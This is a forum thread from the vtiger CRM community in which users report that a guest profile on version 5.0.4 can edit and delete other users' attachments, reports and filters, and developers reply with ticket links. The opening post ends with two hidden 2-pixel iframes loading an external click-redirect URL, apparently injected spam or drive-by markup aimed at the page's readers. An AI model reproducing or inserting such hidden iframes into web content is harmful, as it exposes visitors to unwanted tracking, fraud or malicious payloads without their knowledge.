Attachments
Anyone, even the guest profile, even without insert/delete permission on modules, can insert and delete attachments, even those inserted by other users.
Reports
Anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit reports, even those inserted by other users.
Filters
Anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit filters, even those inserted by other users.
In a old post on this forum someone told me that this was a good feature and a ticket has been opened, but on the 5.0.4 test site
<!-- m --><a class="postlink" href="
http://en.vtiger.com/wip">http://en.vtiger.com/wip</a><!-- m -->
all stilll 'works" on the same way.
I've just created the guest1 user (password guest1) with the guest profile
and I've deleted some default filters, I've edited default reports and deleted custom reports created from other users, deleted other users's attachments, and so on... all having just the guest profile.
I'm using vTiger in my organization since march 2007, but I'm having seriuos security problem because of this lack and I really hope that this feature will be implemented as soon as possible.
Thank You <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
Comments
we had a discussion about this one already. kindly refer the following thread
<!-- m --><a class="postlink" href="http://forums.vtiger.com/viewtopic.php?t=15094">http://forums.vtiger.com/viewtopic.php?t=15094</a><!-- m -->
we also have a ticket in vtiger trac about this.
<!-- m --><a class="postlink" href="http://trac.vtiger.com/cgi-bin/trac.cgi/ticket/4083">http://trac.vtiger.com/cgi-bin/trac.cgi/ticket/4083</a><!-- m -->
it will be addressed in one of the future releases. kindly bear with us.
thanks & regards,
minnie.
"would be nice feature - possibility to set up various default view for various users/groups."
it just give the option to create personal view, but the security hole is still present on the 5.0.4 version.
the problem i'm talking about is more complex ad it'a about security.
please try to log in with a guest profile and verify that you can create, edit and delete a lot of views, reports, tickets, attachments, etc...
i wholeheartedly agree with you and just recently had this issue brought to my attention from another user as well. i have submitted this issue to the trac here:
http://trac.vtiger.com/cgi-bin/trac.cgi/ticket/5249#preview
reg
i hope someone will give a good answer too...
do have a look at the discussion on the developer list:
<!-- m --><a class="postlink" href="http://lists.vtigercrm.com/pipermail/vtigercrm-developers/2008-april/002791.html">http://lists.vtigercrm.com/pipermail/vt ... 02791.html</a><!-- m -->
feature 3 and 5 are related to this post.
porting the code to 5.0.4 needs some support, do give your helping hand for this <!-- s:) --><img src="{smilies_path}/icon_smile.gif" alt=":)" title="smile" /><!-- s:) -->
regards,
prasad
vtiger team
thank you
we just ran into a huge problem with attachment permissions
here is a post that i submitted:
<!-- m --><a class="postlink" href="http://forums.vtiger.com/viewtopic.php?p=66420#66420">http://forums.vtiger.com/viewtopic.php?p=66420#66420</a><!-- m -->
anyone have any ideas?
-bennett
i will look forward to knowing more about the topic.
-bennett